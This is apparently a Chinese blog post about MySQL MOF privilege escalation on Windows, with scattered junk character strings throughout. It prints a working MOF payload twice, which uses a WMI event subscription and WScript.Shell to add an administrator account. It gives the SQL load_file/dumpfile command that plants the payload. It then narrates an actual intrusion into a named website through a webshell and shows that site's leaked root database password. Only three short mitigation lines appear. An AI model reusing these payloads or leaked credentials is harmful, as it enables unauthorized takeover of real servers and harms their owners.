Mysql mof扩展漏洞实例与防范

admin

Mysql mof扩展漏洞防范方法

2 p$ b$ l4 |1 V4 _, [网上公开的一些利用代码:

( p: _8 g( o! d( T#pragma namespace(“\\\\.\\root\\subscription”)

instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
$ {5 S- s  r, E, q( I: o
3 i3 j5 W8 t3 {- p8 c6 [& ?* T1 R
& W/ o4 T! y0 H. ?! [


连接mysql数据库后执行： select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
从上面代码来看得出解决办法：

1、mysql用户权限控制，禁止 “load_file”、”dumpfile”等函数

  U5 W/ i1 O3 T" }' v! }0 F2、禁止使用”WScript.Shel”组件
) J; ^# o  p9 l
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER

当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
3 Z$ `9 [/ R! }5 B
1 _+ E' E* V  w& H; s事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
$ n5 ]" r; W$ e1 ~3 h
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
9 T" r6 ^' t4 A8 j& W& ?  n) b; J$ w
看懂了后就开始练手吧

% o* K$ J3 C; J; qhttp://www.webbmw.com/config/config_ucenter.php 一句话 a
9 E! a2 w+ p# S' k' s9 y% Q- ~" X
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
+ m* z4 [! y  d9 K6 a
于是直接用菜刀开搞
  b9 P5 C7 L7 ]3 }3 R$ A+ T
上马先

6 \0 Z% k2 a. D( u/ y既然有了那些账号 之类的 于是我们就执行吧…….
4 g( ^1 I: t/ c7 L6 |2 Z( p
小小的说下

& Z: _' v% o+ _7 _& L3 b2 o在这里第1次执行未成功        原因未知

我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。

& L# t1 ]1 T  k: w#pragma namespace(“\\\\.\\root\\subscription”)

/ b0 N7 \3 _/ [9 j) v$ ?1 Uinstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
* q  @8 @; `! X
8 V( }5 Z- c& J, f我是将文件放到C:\WINDOWS\temp\1.mof
' m+ ^- D0 ]/ S! J; ~3 |; ?; _
& z# u% ]1 `6 v4 H! v, t所以我们就改下执行的代码
' d9 {6 x/ S: s
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;

+ _. w& R4 w  f, E' Y% }/ a  B  O9 a
6 E) a! x6 w, A9 H- z/ c/ t$ |
: ~, V; @# o7 D0 q$ @/ {1 W! h但是 你会发现账号还是没有躺在那里。。
# W0 Z2 N& l7 D: [
! Z0 }: b  k+ X9 X# v于是我就感觉蛋疼

; Z  t/ k) ]! E' M" z就去一个一个去执行 但是执行到第2个 mysql时就成功了………

+ _( D/ J2 A  m7 V

但是其他库均不成功…

+ g' G# f2 Z2 F7 }  t( @) u我就很费解呀 到底为什么不成功求大牛解答…

+ t  r7 \  Y& t! W7 L  j9 I​
8 N; y# m! L. f% n4 ^# I/ z1 t0 T